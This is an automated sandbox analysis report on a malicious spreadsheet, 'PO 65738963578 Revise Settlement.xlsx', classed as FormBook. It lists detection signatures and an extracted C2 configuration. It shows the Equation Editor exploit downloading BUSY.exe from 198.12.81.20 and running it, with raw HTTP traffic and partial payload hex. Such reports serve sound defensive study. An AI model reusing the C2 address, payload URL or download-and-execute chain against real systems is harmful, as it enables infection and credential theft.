Windows Analysis Report
PO 65738963578 Revise Settlement.xlsx

Overview

General Information

Sample Name: PO 65738963578 Revise Settlement.xlsx
Analysis ID: 626146
MD5: e5c9c992c088a778a6348f4a58dd78d3
SHA1: 754f386df06785ddd4cb4a04bed626ceab65d5ab
SHA256: 6b8ffb251308a2396f35780df9376b329a6c741419db44ea4f89d88ed932fbf2
Tags: VelvetSweatshopxlsx
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection

barindex
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.cortesdisenosroutercnc.com/itq4/"], "decoy": ["worklocalcortland.com", "hostydom.tech", "ittakegenius.com", "clarisfixion.com", "totalzerosband.com", "shop-for-432.club", "exploremytruth.com", "skarpaknivar.com", "teknikunsur.net", "shoppingclick.online", "808gang.net", "solobookings.com", "mikunandina.com", "insumedkap.com", "kingdomcell.com", "qabetalive838475.com", "foxyreal.website", "filmweltruhr.com", "pokibar.com", "girassolpresentes.com", "rprent.com", "klatch22.com", "qam3.com", "bbuur.com", "grandmino.com", "windowcontractor.info", "myownstack.com", "suprebahia.com", "amaliebeac.space", "rugggedclassicvinyl.com", "thevillagetour.com", "obsoletely.xyz", "fintell.online", "mychianfts.net", "skillingyousoftly.com", "mejicat.com", "tntpowerspeedagility.com", "richardklewis.store", "yourdmvhometeam.com", "citestaccnt1631545392.com", "weddingbyneus.com", "mbkjewelry.com", "shubhamsports.com", "bountyhub.xyz", "heritage.solar", "vitalorganicbarsoap.com", "cloandjoe.com", "royalluxextensions.com", "lbrzandvoort.com", "knowmust.xyz", "okpu.top", "balanz.kitchen", "buggy4t.com", "gownstevensond.com", "f4w6.claims", "workingfromgarden.com", "foryourtinyhuman.com", "preventbiotech.com", "happyklikshop.com", "tuyenxanh.com", "lift2.cloud", "skazhiraku.net", "purpleatticexperiment.com", "freebtc.pro"]}
Source: PO 65738963578 Revise Settlement.xlsx Virustotal: Detection: 41% Perma Link
Source: PO 65738963578 Revise Settlement.xlsx ReversingLabs: Detection: 29%
Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: www.cortesdisenosroutercnc.com/itq4/ Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeC: Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeiiC: Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exej Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: 2.3.EQNEDT32.EXE.998472.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.931118.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.998472.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.EQNEDT32.EXE.931118.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.idcqz.exe.160000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 198.12.81.20 Port: 80 Jump to behavior
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B

Software Vulnerabilities

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0379043F ShellExecuteW,ExitProcess, 2_2_0379043F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790411 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790411
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037902FD ExitProcess, 2_2_037902FD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903BC URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903BC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790332 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790332
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0379042A ShellExecuteW,ExitProcess, 2_2_0379042A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790464 ExitProcess, 2_2_03790464
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790316 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790316
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80

Networking

barindex
Source: Malware configuration extractor URLs: www.cortesdisenosroutercnc.com/itq4/
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View IP Address: 198.12.81.20 198.12.81.20
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:42:02 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.17Last-Modified: Fri, 13 May 2022 11:21:13 GMTETag: "3e719-5dee2df4306a6"Accept-Ranges: bytesContent-Length: 255769Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: GET /busy/BUSY.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.20Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exe
Source: EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exeiiC:
Source: EQNEDT32.EXE, 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exej
Source: EQNEDT32.EXE, 00000002.00000003.957494354.0000000000955000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.959904121.000000000040A000.00000008.00000001.01000000.00000004.sdmp, BUSY[1].exe.2.dr, vbc.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8559C53.emf Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2
Source: global traffic HTTP traffic detected: GET /busy/BUSY.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.20Connection: Keep-Alive
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_0040580F

E-Banking Fraud

barindex
Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: 2.2.EQNEDT32.EXE.931118.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.EQNEDT32.EXE.931118.0.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B51890 5_2_00B51890
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B596A0 5_2_00B596A0
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B57E88 5_2_00B57E88
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B59C12 5_2_00B59C12
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5C3BD 5_2_00B5C3BD
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5A184 5_2_00B5A184
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5B3F1 5_2_00B5B3F1
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00110A56 5_2_00110A56
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: PO 65738963578 Revise Settlement.xlsx Virustotal: Detection: 41%
Source: PO 65738963578 Revise Settlement.xlsx ReversingLabs: Detection: 29%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
